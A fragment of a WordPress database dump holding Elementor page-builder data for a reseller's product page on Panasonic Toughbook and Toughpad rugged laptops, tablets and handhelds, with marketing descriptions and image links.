54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":51},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":53},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":35},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3726,2689,'_elementor_version','0.4'),(3729,2690,'_elementor_edit_mode','builder'),(3730,2690,'_elementor_template_type','post'),(3731,2690,'_wp_page_template','template-fullwidth.php'),(3732,2690,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":52},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":51},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 